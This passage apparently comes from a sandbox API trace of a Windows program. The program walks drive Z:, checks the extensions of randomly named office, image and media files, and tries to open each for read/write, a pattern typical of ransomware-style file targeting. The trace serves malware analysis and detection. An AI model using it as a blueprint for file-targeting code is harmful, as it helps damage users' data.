ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9697, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K7PKxXbGrKXfVhE.ppt", cAlternateFileName="")) returned 1 [0183.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.059] PathFindExtensionW (pszPath="Z:\\K7PKxXbGrKXfVhE.ppt") returned=".ppt" [0183.062] CreateFileW (lpFileName="Z:\\K7PKxXbGrKXfVhE.ppt" (normalized: "z:\\k7pkxxbgrkxfvhe.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.064] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa60c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yFDjrYVFhxr1o.rtf", cAlternateFileName="")) returned 1 [0183.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.064] PathFindExtensionW (pszPath="Z:\\yFDjrYVFhxr1o.rtf") returned=".rtf" [0183.067] CreateFileW (lpFileName="Z:\\yFDjrYVFhxr1o.rtf" (normalized: "z:\\yfdjryvfhxr1o.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.069] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x142d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvxie8.docx", cAlternateFileName="")) returned 1 [0183.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.069] PathFindExtensionW (pszPath="Z:\\uvxie8.docx") returned=".docx" [0183.073] CreateFileW (lpFileName="Z:\\uvxie8.docx" (normalized: "z:\\uvxie8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.074] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfe90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aVdNk.pps", cAlternateFileName="")) returned 1 [0183.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.074] PathFindExtensionW (pszPath="Z:\\aVdNk.pps") returned=".pps" [0183.078] CreateFileW (lpFileName="Z:\\aVdNk.pps" (normalized: "z:\\avdnk.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.079] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf47b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="igduZ1s2R.xlsx", cAlternateFileName="")) returned 1 [0183.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.079] PathFindExtensionW (pszPath="Z:\\igduZ1s2R.xlsx") returned=".xlsx" [0183.082] CreateFileW (lpFileName="Z:\\igduZ1s2R.xlsx" (normalized: "z:\\igduz1s2r.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.083] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcb6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RtBpO.pps", cAlternateFileName="")) returned 1 [0183.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.083] PathFindExtensionW (pszPath="Z:\\RtBpO.pps") returned=".pps" [0183.087] CreateFileW (lpFileName="Z:\\RtBpO.pps" (normalized: "z:\\rtbpo.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.089] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12aca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ekGGyeqFk2bhWU.jpg", cAlternateFileName="")) returned 1 [0183.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.089] PathFindExtensionW (pszPath="Z:\\ekGGyeqFk2bhWU.jpg") returned=".jpg" [0183.096] CreateFileW (lpFileName="Z:\\ekGGyeqFk2bhWU.jpg" (normalized: "z:\\ekggyeqfk2bhwu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.098] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Daynev4hNYGuoMWbxLXC.pptx", cAlternateFileName="")) returned 1 [0183.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.098] PathFindExtensionW (pszPath="Z:\\Daynev4hNYGuoMWbxLXC.pptx") returned=".pptx" [0183.102] CreateFileW (lpFileName="Z:\\Daynev4hNYGuoMWbxLXC.pptx" (normalized: "z:\\daynev4hnyguomwbxlxc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.103] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x147e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4s6BCb3WGeEnQU.bmp", cAlternateFileName="")) returned 1 [0183.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.103] PathFindExtensionW (pszPath="Z:\\4s6BCb3WGeEnQU.bmp") returned=".bmp" [0183.107] CreateFileW (lpFileName="Z:\\4s6BCb3WGeEnQU.bmp" (normalized: "z:\\4s6bcb3wgeenqu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.108] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1594c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v0CV5yZU8GBZK.flv", cAlternateFileName="")) returned 1 [0183.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.108] PathFindExtensionW (pszPath="Z:\\v0CV5yZU8GBZK.flv") returned=".flv" [0183.111] CreateFileW (lpFileName="Z:\\v0CV5yZU8GBZK.flv" (normalized: "z:\\v0cv5yzu8gbzk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.112] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xgOBxEjMJN.swf", cAlternateFileName="")) returned 1 [0183.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.113] PathFindExtensionW (pszPath="Z:\\xgOBxEjMJN.swf") returned=".swf" [0183.116] CreateFileW (lpFileName="Z:\\xgOBxEjMJN.swf" (normalized: "z:\\xgobxejmjn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.117] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xgOBxEjMJN.swf", cAlternateFileName="")) returned 0 [0183.117] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.118] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 